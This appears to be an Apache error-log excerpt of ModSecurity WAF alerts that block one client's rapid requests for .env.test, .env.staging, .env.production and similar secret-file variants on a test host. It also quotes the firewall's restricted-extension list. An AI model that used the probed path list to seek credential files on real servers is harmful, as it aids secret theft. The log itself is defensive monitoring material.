[Fri May 30 17:12:46.907245 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDnK7qfe6YUdhe6un0PPyQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.live
[Fri May 30 17:12:47.326001 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDnK76fe6YUdhe6un0PPygAAAAE"], referer: http://surf.test.indacotrentino.com/.env.test
[Fri May 30 17:12:47.326486 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDnK76fe6YUdhe6un0PPygAAAAE"], referer: http://surf.test.indacotrentino.com/.env.test
[Fri May 30 17:12:47.326781 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDnK76fe6YUdhe6un0PPygAAAAE"], referer: http://surf.test.indacotrentino.com/.env.test
[Fri May 30 17:12:47.643677 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDnK76fe6YUdhe6un0PPywAAAAE"], referer: http://surf.test.indacotrentino.com/.env.test
[Fri May 30 17:12:47.643942 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDnK76fe6YUdhe6un0PPywAAAAE"], referer: http://surf.test.indacotrentino.com/.env.test
[Fri May 30 17:12:47.644129 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aDnK76fe6YUdhe6un0PPywAAAAE"], referer: http://surf.test.indacotrentino.com/.env.test
[Fri May 30 17:12:48.063251 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDnK8Kfe6YUdhe6un0PPzAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.staging
[Fri May 30 17:12:48.063537 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDnK8Kfe6YUdhe6un0PPzAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.staging
[Fri May 30 17:12:48.063783 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDnK8Kfe6YUdhe6un0PPzAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.staging
[Fri May 30 17:12:48.380728 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDnK8Kfe6YUdhe6un0PPzQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.staging
[Fri May 30 17:12:48.381023 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDnK8Kfe6YUdhe6un0PPzQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.staging
[Fri May 30 17:12:48.381227 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDnK8Kfe6YUdhe6un0PPzQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.staging
[Fri May 30 17:12:48.799678 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8Kfe6YUdhe6un0PPzgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:48.799881 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8Kfe6YUdhe6un0PPzgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:48.800120 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8Kfe6YUdhe6un0PPzgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:48.800309 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8Kfe6YUdhe6un0PPzgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:49.117044 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8afe6YUdhe6un0PPzwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:49.117256 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8afe6YUdhe6un0PPzwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:49.117515 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8afe6YUdhe6un0PPzwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:49.117720 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDnK8afe6YUdhe6un0PPzwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.backup
[Fri May 30 17:12:49.535563 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDnK8afe6YUdhe6un0PP0AAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production
[Fri May 30 17:12:49.535859 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDnK8afe6YUdhe6un0PP0AAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production
[Fri May 30 17:12:49.536055 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDnK8afe6YUdhe6un0PP0AAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production
[Fri May 30 17:12:49.853902 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDnK8afe6YUdhe6un0PP0QAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production
[Fri May 30 17:12:49.854212 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDnK8afe6YUdhe6un0PP0QAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production
[Fri May 30 17:12:49.854544 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDnK8afe6YUdhe6un0PP0QAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production
[Fri May 30 17:12:50.272761 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDnK8qfe6YUdhe6un0PP0gAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development
[Fri May 30 17:12:50.273040 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDnK8qfe6YUdhe6un0PP0gAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development
[Fri May 30 17:12:50.273258 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDnK8qfe6YUdhe6un0PP0gAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development
[Fri May 30 17:12:50.590428 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDnK8qfe6YUdhe6un0PP0wAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development
[Fri May 30 17:12:50.590869 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDnK8qfe6YUdhe6un0PP0wAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development
[Fri May 30 17:12:50.591188 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDnK8qfe6YUdhe6un0PP0wAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development
[Fri May 30 17:12:51.009284 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDnK86fe6YUdhe6un0PP1AAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod
[Fri May 30 17:12:51.009551 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDnK86fe6YUdhe6un0PP1AAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod
[Fri May 30 17:12:51.009747 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDnK86fe6YUdhe6un0PP1AAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod
[Fri May 30 17:12:51.327074 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDnK86fe6YUdhe6un0PP1QAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod
